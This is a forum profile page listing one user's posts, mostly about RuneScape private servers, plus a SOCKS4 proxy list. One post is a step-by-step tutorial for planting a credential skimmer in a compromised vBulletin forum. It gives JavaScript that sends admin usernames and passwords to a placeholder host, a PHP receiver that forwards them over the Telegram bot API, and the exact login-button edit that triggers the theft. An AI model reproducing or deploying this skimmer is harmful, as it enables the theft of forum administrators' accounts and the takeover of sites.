Jump to content


  • Posts

  • Joined

  • Last visited

  • Days Won


panfrost last won the day on April 2

panfrost had the most liked content!

Recent Profile Visitors

842 profile views

panfrost's Achievements


Newbie (1/14)



  1. Making spawn tools for rsps you are not staff in is almost impossible to complete. Easier way will be building a packet sending client, that is actually a hack itself, like vswitcher for example for OSRS.
  2. I saw this on codecanyon, aswell released/leaked 2 years ago. its everywhere. I saw this on codecanyon, aswell released/leaked 2 years ago. its everywhere.
  3. This tutorial is for education purposes only. Hello, if you ever had the access to a server hosting a vBulletin forum, you would probably be able to access the admin panel by grabbing the database password from the config files, then change the admin encrypted password by your encrypted password from the database to access the admin panel, but probably you’ll be out the server pretty soon. but there’s a better solution which’s getting the admin plain text password, by a phishing attack or stealing his password using JavaScript, which I’ll be cover in this topic. we could use PHP and get the password after the post request but vBulletin encrypts the password with MD5 using JavaScript in the Client Side, so we’ll try to grab the password before it gets encrypted. the script I’ll be using is: function mal() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://example/admindata.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); xhr.send("Data="+document.getElementById("vb_login_username").value + " " + document.getElementById("vb_login_password").value); } the given script grabs the password and sends it to a PHP script which then writes it to a file or sends it to you using telegram or with email, an example using telegram API: <?php if ($_SERVER['REQUEST_METHOD'] == "POST" && isset($_POST['Data'])) { $token = "YOUR_TOKEN"; file_get_contents("https://api.telegram.org/bot$token/sendMessage? chat_id=YOUR_CHAT_ID&text=" . urlencode($_POST['Data'])."" ); } else header("Location: https://google.com"); ?> so now you can upload the PHP script on the same server or your server, or you can send the passwords directly from the JavaScript. now we’ll have to edit the index page and add our JavaScript script to it and edit somethings to get everything done. the index page is located in: ./core/includes/adminfunctions.php add the javascript script inside a tag, and edit this line : <input type="submit" class="button" value=" <?php echo $vbphrase['log_in']; ?> " accesskey="s" tabindex="3" /> to: <input type="submit" onclick="mal()" class="button" value=" <?php echo $vbphrase['log_in']; ?> " accesskey="s" tabindex="3" /> and now wait for admins passwords, that’s it, peace out!
  4. Packages explained Game Server: Adjust DB information in the `server.example.properties` file, then rename it to `server.properties` you will need to be sure to assign different ports if you'd like to load multiple worlds on one central server Client (runelite) Use the `CustomMain` class to designate whether you're like to run in development or live mode. You can edit these configurations in the `CustomWorldType` class. To run the client, you will need to upload the included "worlds.ws" file to a webhost and point the client at the new url Central Server: This controls the world list for the client and the cross-world chats such as clan chat and pms. Webhooks: This api was purely used for runelite highscores integration. Just leave it alone if you don't know what you're doing. API Poorly named. This is really more of a library where methods that are used across the packages can be accessed from. Launcher This was a simple, no-nonsense launcher that simply updated the client jar for users. Make any adjustments for your client download link the `Main` class. No need to update some silly text document or anything, the launcher checks that the user has the most up-to-date client, and if there is a new version, it downloads it. Update Server This server serves the cache to users. The update server must be running to launch the client. A note about running this server in production For security reasons, I have not released our web integration. You will notice that the central server calls back to our website for authentication, however, for someone who knows what they're doing, they can recreate this. Otherwise, you can strip that integration out and only load players based on local authentication. you can run the server in development mode and you will be able to connect without web authentication. Credits: Bart: OS-S Nick: Runite Leviticus: OS-Fatality ReverendDread - Kronos Developer RSPSi - Kronos Developer Rogers - Kronos Modeler Patrity Downloads Servers + Client + Cache DB + worlds.ws
  5. Fresh and Checked SOCKS4 Proxylist Amount: 2920 Settings: Timeout: 3 Retries: 3 Updated: 11/14/2020 04:40:52 Download: https://pastebin.com/zVW1YEDW
  6. Ngl I prefer the third option. The best one.
  7. panfrost

    Client Launcher

    Thanks for this launcher I will sell it.
  8. How to install Vorkath?!!!!!!!!
  • Create New...